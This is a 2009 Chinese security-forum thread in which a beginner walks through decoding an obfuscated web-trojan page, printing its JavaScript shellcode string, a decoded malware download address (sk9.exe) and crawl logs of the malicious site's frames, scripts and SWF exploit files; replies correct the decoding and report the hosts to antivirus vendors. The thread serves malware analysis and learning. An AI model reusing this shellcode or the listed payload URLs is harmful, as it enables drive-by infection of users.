小菜终于乱点解出平生第一个“网马”~~~囧

这几天突然对解网马感兴趣，最初在狐狸的网盘看到数种解密工具，随手下了下来，然后就开始到处找资料教程。。。但基本上没有针对我这种小菜的。。。。勉强看了几个录像~~还是啥也不懂。。。继续复制毒网开始瞎点~~~~

晚上上google搜索恶意网址，在瑞星恶意网站监测网看到，随手复制了几个，都没搞出来。。。
最后到了这个
hxxp://uhb33.wsxx0080.cn

嘎嘎，用freshow先filter一下。。。

Log is generated by FreShow.
[wide]http://uhb33.wsxx0080.cn
    [frame]http://uhb33.wsxx0080.cn/Er.htm
    [frame]http://uhb33.wsxx0080.cn/flash.htm
    [frame]http://uhb33.wsxx0080.cn/xx.htm
    [frame]http://uhb33.wsxx0080.cn/office.htm
    [frame]http://uhb33.wsxx0080.cn/02.htm
    [script]http://uhb33.wsxx0080.cn/reee.js
    [script]http://uhb33.wsxx0080.cn/rkkk.js

看着hxxp://uhb33.wsxx0080.cn/xx.htm这个比较可疑。。选中check再filter

Log is generated by FreShow.
[wide]http://uhb33.wsxx0080.cn
    [frame]http://uhb33.wsxx0080.cn/Er.htm
    [frame]http://uhb33.wsxx0080.cn/flash.htm
    [frame]http://uhb33.wsxx0080.cn/xx.htm
        [script]http://uhb33.wsxx0080.cn/xx.js
    [frame]http://uhb33.wsxx0080.cn/office.htm
    [frame]http://uhb33.wsxx0080.cn/02.htm
    [script]http://uhb33.wsxx0080.cn/reee.js
    [script]http://uhb33.wsxx0080.cn/rkkk.js

多了hxxp://uhb33.wsxx0080.cn/xx.js依然可疑。。。选中。。check 再 filter

var shellcode = unescape("Game9090Game9090Game0febGame335bGame66c9Game80b9Game8001Gameef33Gamee243GameebfaGamee805GameffecGameffffGame8b7fGamedf4eGameefefGame64efGamee3afGame9f64Game42f3Game9f64Game6ee7Gameef03GameefebGame64efGameb903Game6187Gamee1a1Game0703Gameef11GameefefGameaa66Gameb9ebGame7787Game6511Game07e1Gameef1fGameefefGameaa66Gameb9e7Gameca87Game105fGame072dGameef0dGameefefGameaa66Gameb9e3Game0087Game0f21Game078fGameef3bGameefefGameaa66Gameb9ffGame2e87Game0a96Game0757Gameef29GameefefGameaa66GameaffbGamed76fGame9a2cGame6615Gamef7aaGamee806GameefeeGameb1efGame9a66Game64cbGameebaaGameee85Game64b6Gamef7baGame07b9Gameef64GameefefGame87bfGamef5d9Game9fc0Game7807GameefefGame66efGamef3aaGame2a64Game2f6cGame66bfGamecfaaGame1087GameefefGamebfefGameaa64Game85fbGameb6edGameba64Game07f7Gameef8eGameefefGameaaecGame28cfGameb3efGamec191Game288aGameebafGame8a97GameefefGame9a10Game64cfGamee3aaGameee85Game64b6Gamef7baGameaf07GameefefGame85efGameb7e8GameaaecGamedccbGamebc34Game10bcGamecf9aGamebcbfGameaa64Game85f3Gameb6eaGameba64Game07f7GameefccGameefefGameef85Game9a10Game64cfGamee7aaGameed85Game64b6Gamef7baGameff07GameefefGame85efGame6410GameffaaGameee85Game64b6Gamef7baGameef07GameefefGameaeefGamebdb4Game0eecGame0eecGame0eecGame0eecGame036cGameb5ebGame64bcGame0d35Gamebd18Game0f10Game64baGame6403Gamee792Gameb264Gameb9e3Game9c64Game64d3Gamef19bGameec97Gameb91cGame9964GameeccfGamedc1cGamea626Game42aeGame2cecGamedcb9Gamee019Gameff51Game1dd5Gamee79bGame212eGameece2Gameaf1dGame1e04Game11d4Game9ab1Gameb50aGame0464Gameb564GameeccbGame8932Gamee364Game64a4Gamef3b5Game32ecGameeb64Gameec64Gameb12aGame2db2Gameefe7Game1b07Game1011Gameba10Gamea3bdGamea0a2Gameefa1");
home = unescape("Game7468Game7074Game2f3aGame612fGame6473Game2e31Game7568Game6961Game7568Game6961Game6164Game376eGame3335Game632eGame2f6eGame6b73Game2e39Game7865Game0065");

看到这个比较“熟悉”了。。。毕竟好多所谓“简单解密网马”的教程和录像里面都有类似的加密代码。。嘿嘿，一看开头，shellcode。。恩。。有个ShellCode解密器~从引号里复制所有，搞进去。。。解密~~



。。。
咋回事。。。咋解不出来捏。。。囧
回想刚才看的视频。。。解释了shellcode就是百分号后面的四位数是两位两位的换位置。。。这里没百分号。。倒是这个Game很多很重复很规律。。。
随即用replace替换Game成%


用freshow的ASCII解密



嘎嘎，很像地址了。。。但为啥是乱的捏。。。上次有个shellcode用freshow解，最后地址也是乱的。。但是shellcode解密器就是正确的。。。
那试试shellcode解密器吧。。。

囧。。。
彻底没解出来。。。
再观察freshow解出来的“类地址”。。。
thpt/:a/ds.1uhiauhiaad7n35c./nks.9xee
根据shellcode的原理。。发现规律了
每两个字母位置调换。。。很手工的东西。。。
hxxp://ads1.huaihuaidan753.cn/sk9.exe
最后地址。。。
下载下来

咋那么小。。。
沙盘运行之。。。

竟然一大个命令提示符窗口跳出来在运行什么东东~~太嚣张了
最后出错。。

无论选择什么都会退出。。
沙盘一看。。。

注册表没动过。。。
生成东西不多，但在的位置和后缀都是非常敏感的~~~

至此~~我的第一只网马已经被斩~~~
你要问我心情怎么样？

那是~~相~~~~当~~~的爽~~~~


当然，本小菜头回摸索着弄，很多地方欠妥。。。希望大侠们帮帮我，尤其给点基础点的教程或者录像视频~~~~网上的都一头雾水啊~~~~

[ 本帖最后由 单身熟男 于 2009-4-29 13:29 编辑 ]

难得发回主题。。。抢个沙发不过分吧~~~

幸福的猪猪

楼主没调换好字母的位置，下载了一个不是病毒的文件！不过在看完你的文章之后，我也学到不少的东东！

Log is generated by FreShow.
[wide]http://uhb33.wsxx0080.cn
    [frame]http://uhb33.wsxx0080.cn/Er.htm
        [script]http://uhb33.wsxx0080.cn/14.js
            [object]http://asd1.huaihuaidan753.cn/sk9.exe
    [frame]http://uhb33.wsxx0080.cn/flash.htm
    [frame]http://uhb33.wsxx0080.cn/xx.htm
        [script]http://uhb33.wsxx0080.cn/xx.js
    [frame]http://uhb33.wsxx0080.cn/office.htm
        [script]http://uhb33.wsxx0080.cn/office.js
    [frame]http://uhb33.wsxx0080.cn/02.htm
        [script]http://uhb33.wsxx0080.cn/set.js
    [script]http://uhb33.wsxx0080.cn/reee.js
    [script]http://uhb33.wsxx0080.cn/rkkk.js
        [frame]http://uhb33.wsxx0080.cn/lz.htm
        [frame]http://uhb33.wsxx0080.cn/bf.htm
            [script]http://uhb33.wsxx0080.cn/bf1.js
            [script]http://uhb33.wsxx0080.cn/bf.js

http://asd1.huaihuaidan753.cn/sk9.exe
http://uhb33.wsxx0080.cn/f28.swf
http://uhb33.wsxx0080.cn/f45.swf
http://uhb33.wsxx0080.cn/f47.swf
http://uhb33.wsxx0080.cn/f64.swf
http://uhb33.wsxx0080.cn/f115.swf
http://uhb33.wsxx0080.cn/i16.swf
http://uhb33.wsxx0080.cn/i115.swf
http://uhb33.wsxx0080.cn/i28.swf
http://uhb33.wsxx0080.cn/i45.swf
http://uhb33.wsxx0080.cn/i47.swf
http://uhb33.wsxx0080.cn/i64.swf
http://uhb33.wsxx0080.cn/f16.swf


病毒下载地址，上报kaba！

[ 本帖最后由 幸福的猪猪 于 2009-4-29 07:44 编辑 ]

wcyxj123

还是用沙盘比较好！

ldfkafan

网马是这样捉到的啊. 坐下好好学习. 并感谢LZ的分享!

tanlimo

Game->%u  楼主少了个u

taoyuan237

原帖由 单身熟男 于 2009-4-29 02:09 发表
这几天突然对解网马感兴趣，最初在狐狸的网盘看到数种解密工具，随手下了下来，然后就开始到处找资料教程。。。但基本上没有针对我这种小菜的。。。。勉强看了几个录像~~还是啥也不懂。。。继续复制毒网开始瞎点~~~~ ...

视频看不懂的话不妨看看用视频做的文字教程，剑盟有。。。
PS一句我也是从你这个阶段走出来的，认真点有前途的

mox

百度-->懒人小G

囧。。。竟然搞错了哇~~
改标题。。。

胜利十一人

要抓只马还挺难的啊，学习中。